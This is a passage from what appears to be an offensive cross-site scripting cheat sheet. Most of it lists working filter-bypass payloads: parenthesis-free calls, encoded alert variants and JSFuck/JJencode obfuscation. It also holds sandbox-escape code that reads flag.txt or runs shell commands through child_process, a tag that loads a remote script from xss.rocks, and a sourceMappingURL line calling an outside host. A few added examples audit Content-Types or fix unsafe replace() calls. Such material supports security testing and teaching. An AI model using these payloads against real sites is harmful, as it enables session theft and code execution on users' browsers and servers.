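  "function fnHook() { return 'fn'; }",           // function declaration: becomes global too
  "globalThis.explicitHook = () => 'explicit';",  // explicit property: visible in any mode
].join("\n");
const STAGE_B64 = toB64(STAGE);

// Decode and evaluate in the global scope, then report which hooks later code can see.
function runStage(stageB64) {
  (0, eval)(fromB64(stageB64));   // (0, eval) forces an indirect, global-scope eval
  return {
    constHook: typeof globalThis.constHook,
    varHook: typeof globalThis.varHook,
    fnHook: typeof globalThis.fnHook,
    explicitHook: typeof globalThis.explicitHook,
  };
}

console.log(runStage(STAGE_B64));
// { constHook: 'undefined', varHook: 'function', fnHook: 'function', explicitHook: 'function' }
```

A direct `eval(...)` call made from inside a function is even more restrictive, since its `var` declarations land in that function's scope rather than on `window`; assigning to `globalThis` (or `window`) explicitly, or injecting a `<script>` element as shown above, is the portable way to leave a hook behind for the page's other scripts.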
Unicode Encode (JS execution)
\u0061lert(1)
\u{61}lert(1)
\u0061\u006C\u0065\u0072\u0074(1)
JavaScript blacklist bypass techniques
Strings
"thisisastring"
'thisisastring'
`thisisastring`
/thisisastring/ == "/thisisastring/"
/thisisastring/.source == "thisisastring"
"\h\e\l\l\o"
String.fromCharCode(116,104,105,115,105,115,97,115,116,114,105,110,103)
"\x74\x68\x69\x73\x69\x73\x61\x73\x74\x72\x69\x6e\x67"
"\164\150\151\163\151\163\141\163\164\162\151\156\147"
"\u0074\u0068\u0069\u0073\u0069\u0073\u0061\u0073\u0074\u0072\u0069\u006e\u0067"
"\u{74}\u{68}\u{69}\u{73}\u{69}\u{73}\u{61}\u{73}\u{74}\u{72}\u{69}\u{6e}\u{67}"
"\a\l\ert\(1\)"
atob("dGhpc2lzYXN0cmluZw==")
eval(8680439..toString(30))(983801..toString(36))
Special escape sequences
"\b" //backspace
"\f" //form feed
"\n" //new line
"\r" //carriage return
"\t" //tab
// Any other char escaped is just itself
Space substitutions inside JS code
<TAB>
/**/
JavaScript comments (from the JavaScript Comments trick)
//This is a 1 line comment
/* This is a multiline comment*/
<!--This is a 1 line comment
#!This is a 1 line comment, but "#!" must be at the very beginning of the script
-->This is a 1 line comment, but "-->" must be at the beginning of a line
JavaScript new lines (from the JavaScript new line trick)
//JavaScript interprets these chars as new lines:
String.fromCharCode(10)
alert("//\nalert(1)") //0x0a
String.fromCharCode(13)
alert("//\ralert(1)") //0x0d
String.fromCharCode(8232)
alert("//\u2028alert(1)") //0xe2 0x80 0xa8
String.fromCharCode(8233)
alert("//\u2029alert(1)") //0xe2 0x80 0xa9
JavaScript whitespaces
log=[];
function funct(){}
for(let i=0;i<=0x10ffff;i++){
try{
eval(`funct${String.fromCodePoint(i)}()`);
log.push(i);
}
catch(e){}
}
console.log(log)
//9,10,11,12,13,32,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8232,8233,8239,8287,12288,65279
//Either the raw characters can be used or you can HTML encode them if they appear in SVG or HTML attributes:
<img/src/onerror=alert(1)>
JavaScript inside a comment
//If you can only inject inside a JS comment, you can still leak something
//If the user opens DevTools, a request to the indicated sourceMappingURL will be sent
//# sourceMappingURL=https://evdr12qyinbtbd29yju31993gumlaby0.oastify.com
JavaScript without parentheses
// By setting location
window.location='javascript:alert\x281\x29'
x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
// or any DOMXSS sink such as location=name
// Backticks
// Backticks (tagged templates) pass the string as an array of length 1
alert`1`
// Backtips + Tagged Templates + call/apply
eval`alert\x281\x29` // This won't work as it will just return the passed array
setTimeout`alert\x281\x29`
eval.call`${'alert\x281\x29'}`
eval.apply`${[`alert\x281\x29`]}`
[].sort.call`${alert}1337`
[].map.call`${eval}\\u{61}lert\x281337\x29`
// To pass several arguments you can use
function btt(){
console.log(arguments);
}
btt`${'arg1'}${'arg2'}${'arg3'}`
//It's possible to construct a function and call it
Function`x${'alert(1337)'}x`
// .replace can use regexes and call a function if something is found
"a,".replace`a${alert}` //Initial ["a"] is passed to str as "a," and thats why the initial string is "a,"
"a".replace.call`1${/./}${alert}`
// This happened in the previous example
// Change "this" value of call to "1,"
// match anything with regex /./
// call alert with "1"
"a".replace.call`1337${/..../}${alert}` //alert with 1337 instead
// Using Reflect.apply to call any function with any arguments
Reflect.apply.call`${alert}${window}${[1337]}` //Pass the function to call ("alert"), then the "this" value for that function ("window"), which avoids the illegal invocation error, and finally an array of arguments to pass to the function.
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
// Using Reflect.set to call set any value to a variable
Reflect.set.call`${location}${'href'}${'javascript:alert\x281337\x29'}` // It requires a valid object in the first argument (“location”), a property in the second argument and a value to assign in the third.
// valueOf, toString
// These operations are called when the object is used as a primitive
// Because the objet is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used
valueOf=alert;window+''
toString=alert;window+''
// Error handler
window.onerror=eval;throw"=alert\x281\x29";
onerror=eval;throw"=alert\x281\x29";
<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
{onerror=eval}throw"=alert(1)" //No ";"
onerror=alert //No ";" using new line
throw 1337
// Error handler + Special unicode separators
eval("onerror=\u2028alert\u2029throw 1337");
// Error handler + Comma separator
// The comma separator goes through the list and returns only the last element
var a = (1,2,3,4,5,6) // a = 6
throw onerror=alert,1337 // this is throw 1337, after setting the onerror event to alert
throw onerror=alert,1,1,1,1,1,1337
// optional exception variables inside a catch clause.
try{throw onerror=alert}catch{throw 1}
// Has instance symbol
'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}
'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}
// The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol.
- https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md
- https://portswigger.net/research/javascript-without-parentheses-using-dommatrix
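Added example (not code from the original page) showing the mechanics behind the parenthesis-free tricks above: what a tag function actually receives when it is invoked as `` tag`${a}${b}` ``, and how that single fact makes `call`, `Reflect.apply`, `replace` and the `Function` constructor usable without `(`. The `probe` function records its arguments instead of popping an alert so the result can be inspected.

```javascript
// Added example, not code from the original page: what a tag function receives when
// it is invoked as tag`${a}${b}`, and how that turns call/apply/Reflect.apply/replace
// into parenthesis-free calls. `probe` records its arguments instead of alerting.

// Any tagged call gets the literal-strings array first, then one value per ${}.
function showTagArgs(strings, ...values) {
  return { strings: [...strings], values };
}
const tagArgs = showTagArgs`${"arg1"}x${"arg2"}`;   // { strings: ['', 'x', ''], values: ['arg1', 'arg2'] }

const calls = [];
function probe(...args) { calls.push(args); return args[0]; }
const lastCall = () => calls[calls.length - 1];

// alert`1` is alert(["1"]): a one-element array, which stringifies to "1".
function viaPlainTag() { probe`1337`; return String(lastCall()[0]); }

// fn.call`${x}` is fn.call(strings, x): strings becomes `this`, x the first argument.
function viaCall() { probe.call`${"hello"}`; return lastCall(); }

// Reflect.apply.call`${fn}${thisArg}${args}` is Reflect.apply(fn, thisArg, args).
function viaReflectApply() { Reflect.apply.call`${probe}${globalThis}${[1337]}`; return lastCall(); }

// "a".replace.call`1${/./}${fn}` is replace.call(["1","",""], /./, fn):
// `this` stringifies to "1,,", /./ matches "1" and fn is called with the match.
function viaReplace() { "a".replace.call`1${/./}${probe}`; return lastCall(); }

// Function`x${body}x` is Function(["x","x"], body); the trailing `` invokes the result.
function viaFunctionCtor() { return Function`x${"return 42"}x` ``; }

console.log(tagArgs, viaPlainTag(), viaCall(), viaReflectApply(), viaReplace(), viaFunctionCtor());
```

Every trick in the list above is one of these shapes: the strings array is either discarded (`Reflect.apply.call`), used as `this` (`.call`, `.replace.call`) or coerced to a string (`alert`1``), and the `${}` values fill the positional arguments that would normally need parentheses.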
Arbitrary function (alert) call
//Eval like functions
eval('ale'+'rt(1)')
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Function('ale'+'rt(10)')``;
[].constructor.constructor("alert(document.domain)")``
[]["constructor"]["constructor"]`$${alert()}```
import('data:text/javascript,alert(1)')
//General function executions
`` //Can be use as parenthesis
alert`document.cookie`
alert(document['cookie'])
with(document)alert(cookie)
(alert)(1)
(alert(1))in"."
a=alert,a(1)
[1].find(alert)
window['alert'](0)
parent['alert'](1)
self['alert'](2)
top['alert'](3)
this['alert'](4)
frames['alert'](5)
content['alert'](6)
[7].map(alert)
[8].find(alert)
[9].every(alert)
[10].filter(alert)
[11].findIndex(alert)
[12].forEach(alert);
top[/al/.source+/ert/.source](1)
top[8680439..toString(30)](1)
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)
globalThis[`al`+/ert/.source]`1`
this[`al`+/ert/.source]`1`
[alert][0].call(this,1)
window['a'+'l'+'e'+'r'+'t']()
window['a'+'l'+'e'+'r'+'t'].call(this,1)
top['a'+'l'+'e'+'r'+'t'].apply(this,[1])
(1,2,3,4,5,6,7,8,alert)(1)
x=alert,x(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
al\u0065rt`1`
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
<svg><animate onbegin=alert() attributeName=x></svg>
DOM vulnerabilities
There is JS code that is using unsafe, attacker-controlled data such as location.href. An attacker could abuse this to execute arbitrary JS code.
Because of the length of the explanation, DOM vulnerabilities were moved to this page:
There you will find a detailed explanation of what DOM vulnerabilities are, how they are provoked, and how to exploit them.
Also, don't forget that at the end of the mentioned post you can find explanations about DOM Clobbering attacks.
Upgrading Self-XSS
Cookie XSS
If you can trigger an XSS by sending the payload inside a cookie, this is usually a self-XSS. However, if you find a subdomain vulnerable to XSS, you could use this XSS to set a cookie for the whole domain and thus trigger the cookie XSS in the main domain or in other subdomains (the ones vulnerable to cookie XSS). For this you can use the cookie tossing attack:
You can find a great abuse of this technique in this blog post.
Sending your session to the admin
Maybe a user can share their profile with the admin, and if the self-XSS is inside the user's profile and the admin accesses it, they will trigger the vulnerability.
Session Mirroring
If you find a self-XSS and the web page has session mirroring for administrators (for example, allowing clients to ask for help), then for the admin to help you they will be seeing what you are seeing in your session, but from their own session.
You could make the administrator trigger your self-XSS and steal their cookies/session.
Other Bypasses
Normalised Unicode
You could check whether the reflected values are being unicode normalized on the server (or on the client side) and abuse this functionality to bypass protections. Find an example here.
PHP FILTER_VALIDATE_EMAIL flag Bypass
"><svg/onload=confirm(1)>"@x.y
Ruby-On-Rails bypass
Due to RoR mass assignment, quotes are inserted into the HTML, the quote restriction is then bypassed, and additional fields (onfocus) can be added inside the tag.
Form example (from this report), if you send the payload:
contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
The pair "Key","Value" will be echoed back like this:
{" onfocus=javascript:alert('xss') autofocus a"=>"a"}
Then, the onfocus attribute will be inserted and XSS occurs.
Special combinations
<iframe/src="data:text/html,<svg onload=alert(1)>">
<input type=image src onerror="prompt(1)">
<svg onload=alert(1)//
<img src="/" =_=" title="onerror='prompt(1)'">
<img src='1' onerror='alert(0)' <
<script x> alert(1) </script 1=2
<script x>alert('XSS')<script y>
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<svg////////onload=alert(1)>
<svg id=x;onload=alert(1)>
<svg id=`x`onload=alert(1)>
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>
<script>$=1,\u0061lert($)</script>
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
</style></scRipt><scRipt>alert(1)</scRipt>
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
<svg><x><script>alert('1')</x>
<iframe src=""/srcdoc='<svg onload=alert(1)>'>
<svg><animate onbegin=alert() attributeName=x></svg>
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);">
(function(x){this[x+`ert`](1)})`al`
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
document['default'+'View'][`\u0061lert`](3)
XSS with header injection in a 302 response
If you find that you can inject headers in a 302 Redirect response you could try to make the browser execute arbitrary JavaScript. This is not trivial, as modern browsers do not interpret the HTTP response body if the HTTP response status code is 302, so just a cross-site scripting payload is useless.
In this report and this one you can read how you can test several protocols inside the Location header and see if any of them allows the browser to inspect and execute the XSS payload inside the body.
Past known protocols: mailto://, //x:1/, ws://, wss://, empty Location header, resource://.
Only Letters, Numbers and Dots
If you can specify the callback that the JavaScript is going to execute, but it is limited to only letters, numbers and dots, read this section of this post to learn how to abuse this behaviour.
Valid <script> Content-Types to XSS
(From here) If you try to load a script with a content-type such as application/octet-stream, Chrome will throw the following error:
Refused to execute script from ‘https://uploader.c.hc.lc/uploads/xxx' because its MIME type (‘application/octet-stream’) is not executable, and strict MIME type checking is enabled.
The only Content-Types that will allow Chrome to execute a loaded script are the ones inside the const kSupportedJavascriptTypes from https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc
const char* const kSupportedJavascriptTypes[] = {
"application/ecmascript",
"application/javascript",
"application/x-ecmascript",
"application/x-javascript",
"text/ecmascript",
"text/javascript",
"text/javascript1.0",
"text/javascript1.1",
"text/javascript1.2",
"text/javascript1.3",
"text/javascript1.4",
"text/javascript1.5",
"text/jscript",
"text/livescript",
"text/x-ecmascript",
"text/x-javascript",
};
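The practical use of the table above is auditing what your own server emits for user-supplied files: a response under an upload path whose media type is in that list will run as JavaScript when referenced from a `<script src>`. The following is an added example, not code from the page or from Chromium; it mirrors the lookup the table implies (the match is on the media type alone, so parameters such as `charset` are stripped and the comparison is case-insensitive) and then applies it to a constructed list of responses. The `/uploads/` prefix and the sample URLs are assumptions.

```javascript
// Added example (not from the page or Chromium): would this Content-Type let
// Chrome execute the response as a classic script? The table is the page's
// kSupportedJavascriptTypes list.
const SUPPORTED_JAVASCRIPT_TYPES = new Set([
  "application/ecmascript", "application/javascript",
  "application/x-ecmascript", "application/x-javascript",
  "text/ecmascript", "text/javascript",
  "text/javascript1.0", "text/javascript1.1", "text/javascript1.2",
  "text/javascript1.3", "text/javascript1.4", "text/javascript1.5",
  "text/jscript", "text/livescript",
  "text/x-ecmascript", "text/x-javascript",
]);

// Reduce a full header value ("Text/JavaScript; charset=UTF-8") to its
// lower-cased media type ("text/javascript"). Parameters play no part in the
// lookup, so they must be removed before comparing; a naive equality test
// against "text/javascript" would miss the charset-bearing form.
function extractMediaType(contentType) {
  if (typeof contentType !== "string") return "";
  const [mediaType] = contentType.split(";", 1);
  return mediaType.trim().toLowerCase();
}

function isExecutableScriptType(contentType) {
  return SUPPORTED_JAVASCRIPT_TYPES.has(extractMediaType(contentType));
}

// Audit helper: given {url, contentType} pairs observed from a crawl, return
// the URLs under the upload prefix (an assumption) that a browser would run
// as JS if an attacker could point a <script src> at them.
function findExecutableUploads(responses, uploadPrefix = "/uploads/") {
  return responses
    .filter((r) => new URL(r.url).pathname.startsWith(uploadPrefix))
    .filter((r) => isExecutableScriptType(r.contentType))
    .map((r) => r.url);
}

// Constructed sample responses (not real hosts).
const SAMPLE_RESPONSES = [
  { url: "https://app.example/uploads/a.bin", contentType: "application/octet-stream" },
  { url: "https://app.example/uploads/b.txt", contentType: "Text/JavaScript; charset=UTF-8" },
  { url: "https://app.example/static/app.js", contentType: "text/javascript" },
  { url: "https://app.example/uploads/c.js", contentType: "text/javascript1.6" },
];

console.log(findExecutableUploads(SAMPLE_RESPONSES));
// Only b.txt is flagged: its media type is in the table once the charset
// parameter and the capitalisation are normalised away, while
// text/javascript1.6 is not in the table and app.js is not an upload.
```

For user uploads the safe serving posture is the one the table makes explicit: emit a media type that is not in this list (for example `application/octet-stream`) together with `X-Content-Type-Options: nosniff`, so that neither the declared type nor sniffing can turn the file into a script.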
Script Types to XSS
(From here) So, which types could be indicated to load a script?
<script type="???"></script>
The answer is:
- module (default, nothing to explain)
- webbundle: Web Bundles is a feature that lets you package a bunch of data (HTML, CSS, JS…) together in a .wbn file.
<script type="webbundle">
{
"source": "https://example.com/dir/subresources.wbn",
"resources": ["https://example.com/dir/a.js", "https://example.com/dir/b.js", "https://example.com/dir/c.png"]
}
</script>
The resources are loaded from the source .wbn, not accessed via HTTP
- importmap: Allows improving the import syntax
<script type="importmap">
{
"imports": {
"moment": "/node_modules/moment/src/moment.js",
"lodash": "/node_modules/lodash-es/lodash.js"
}
}
</script>
<!-- With importmap you can do the following -->
<script>
import moment from "moment"
import { partition } from "lodash"
</script>
This behaviour was used in this writeup to remap a library to eval so it could be abused to trigger XSS.
- speculationrules: This feature is mainly meant to solve some problems caused by pre-rendering. It works like this:
<script type="speculationrules">
{
"prerender": [
{ "source": "list", "urls": ["/page/2"], "score": 0.5 },
{
"source": "document",
"if_href_matches": ["https://*.wikipedia.org/**"],
"if_not_selector_matches": [".restricted-section *"],
"score": 0.1
}
]
}
</script>
Web Content-Types to XSS
(From here) The following Content-Types can execute XSS in all browsers:
- text/html
- application/xhtml+xml
- application/xml
- text/xml
- image/svg+xml
- text/plain (?? not in the list but I think I saw this in a CTF)
- application/rss+xml (off)
- application/atom+xml (off)
In other browsers, other Content-Types can be used to execute arbitrary JS, check: https://github.com/BlackFan/content-type-research/blob/master/XSS.md
xml Content Type
If the page returns a text/xml content-type it's possible to indicate a namespace and execute arbitrary JS:
<xml>
<text>hello<img src="1" onerror="alert(1)" xmlns="http://www.w3.org/1999/xhtml" /></text>
</xml>
<!-- Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 113). Kindle Edition. -->
Special Replacement Patterns
When something like "some {{template}} data".replace("{{template}}", <user_input>) is used, the attacker could use special string replacement patterns to try to bypass some protections: "123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"}))
For example in this writeup, this was used to escape a JSON string inside a script and execute arbitrary code.
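The mechanism behind the payload above is that `String.prototype.replace` (and `replaceAll`) interprets `$'`, `` $` ``, `$&` and `$$` inside a replacement *string*, so `JSON.stringify` output, which escapes quotes but never `$`, can pull the surrounding template text back into the encoded value. The block below is an added example, not code from the page or from the cited writeup; it runs the page's own payload through the vulnerable call and through two fixes (a replacer function, which is never pattern-parsed, and escaping every `$` as `$$`). The function names are assumptions.

```javascript
// Added example (not from the page): vulnerable replace() beside two fixes.

// Vulnerable: the value is passed as a replacement string, so the engine
// expands $' (text after the match), $` (text before the match), $& (the
// match itself) and $$ that happen to appear inside it.
function renderUnsafe(template, value) {
  return template.replace("{{template}}", value);
}

// Fix 1: a replacer function's return value is inserted verbatim; no
// replacement-pattern processing happens at all.
function renderSafe(template, value) {
  return template.replace("{{template}}", () => value);
}

// Fix 2: keep the string form but neutralise every "$" by doubling it
// ("$$" is the pattern that yields a literal "$"). The replacement string
// "$$$$" here is itself pattern-processed and produces "$$".
function escapeReplacement(value) {
  return value.replace(/\$/g, "$$$$");
}
function renderEscaped(template, value) {
  return template.replace("{{template}}", escapeReplacement(value));
}

// The page's payload: JSON.stringify leaves "$", "'" and "`" untouched.
const PAYLOAD = JSON.stringify({ name: "$'$`alert(1)//" });
const TEMPLATE = "123 {{template}} 456";

console.log(renderUnsafe(TEMPLATE, PAYLOAD));
// The "name" value now contains " 456" and "123 " copied from the template,
// text the JSON encoder never saw and therefore never escaped.
console.log(renderSafe(TEMPLATE, PAYLOAD));
console.log(renderEscaped(TEMPLATE, PAYLOAD));
```

When the template text after the placeholder contains quotes or a closing `</script>`, `$'` copies them into what was supposed to be a single JSON string literal, which is the breakout the writeup relied on. Code review should treat any `replace(pattern, untrustedString)` as suspect and prefer the replacer-function form, since it is immune regardless of what the value contains.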
Chrome Cache to XSS
XS Jails Escape
If you only have a limited set of chars to use, check these other valid solutions for XSJail problems:
// eval + unescape + regex
eval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))()
eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequire(%27repl%27)%2estart()%22)()%2f/))
// use of with
with(console)log(123)
with(/console.log(1)/index.html)with(this)with(constructor)constructor(source)()
// Just replace console.log(1) to the real code, the code we want to run is:
//return String(process.mainModule.require('fs').readFileSync('flag.txt'))
with(process)with(mainModule)with(require('fs'))return(String(readFileSync('flag.txt')))
with(k='fs',n='flag.txt',process)with(mainModule)with(require(k))return(String(readFileSync(n)))
with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n)))
//Final solution
with(
/with(String)
with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)
with(mainModule)
with(require(k))
return(String(readFileSync(n)))
/)
with(this)
with(constructor)
constructor(source)()
// For more uses of with go to challenge misc/CaaSio PSE in
// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE
If everything is undefined before executing untrusted code (as in this writeup) it's possible to generate useful objects "out of nothing" to abuse the execution of arbitrary untrusted code:
- Using import()
// although import "fs" doesn’t work, import('fs') does.
import("fs").then((m) => console.log(m.readFileSync("/flag.txt", "utf8")))
- Accessing require indirectly
According to this, modules are wrapped by Node.js inside a function, like this:
;(function (exports, require, module, __filename, __dirname) {
// our actual module code
})
Therefore, if from that module we can call another function, it's possible to use arguments.callee.caller.arguments[1] from that function to access require:
;(function () {
return arguments.callee.caller.arguments[1]("fs").readFileSync(
"/flag.txt",
"utf8"
)
})()
In a similar way to the previous example, it's possible to use error handlers to access the wrapper of the module and get the require function:
try {
null.f()
} catch (e) {
TypeError = e.constructor
}
Object = {}.constructor
String = "".constructor
Error = TypeError.prototype.__proto__.constructor
function CustomError() {
const oldStackTrace = Error.prepareStackTrace
try {
Error.prepareStackTrace = (err, structuredStackTrace) =>
structuredStackTrace
Error.captureStackTrace(this)
this.stack
} finally {
Error.prepareStackTrace = oldStackTrace
}
}
function trigger() {
const err = new CustomError()
console.log(err.stack[0])
for (const x of err.stack) {
// use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arguments to get the parameter
const fn = x.getFunction()
console.log(String(fn).slice(0, 200))
console.log(fn?.arguments)
console.log("=".repeat(40))
if ((args = fn?.arguments)?.length > 0) {
req = args[1]
console.log(req("child_process").execSync("id").toString())
}
}
}
trigger()
Obfuscation & Advanced Bypass
- Several obfuscations in one page: https://aem1k.com/aurebesh.js/
- https://github.com/aemkei/katakana.js
- https://javascriptobfuscator.herokuapp.com/
- https://skalman.github.io/UglifyJS-online/
- http://www.jsfuck.com/
- More sophisticated JSFuck techniques: https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce
- http://utf-8.jp/public/jjencode.html
- https://utf-8.jp/public/aaencode.html
- https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses
//Katana
<script>
([,ウ,,,,ア]=[]+{}
,[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
</script>
//JJencode
<script>$=~[];$={___:++$,$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$:({}+"")[$],$_$:($[$]+"")[$],_$:++$,$_:(!""+"")[$],$__:++$,$_$:++$,$__:({}+"")[$],$_:++$,$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$=($.$+"")[$.__$])+((!$)+"")[$._$]+($.__=$.$_[$.$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$=$.$+(!""+"")[$._$]+$.__+$._+$.$+$.$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$+"\""+$.$_$_+(![]+"")[$._$_]+$.$_+"\\"+$.__$+$.$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
//JSFuck
<script>
(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]
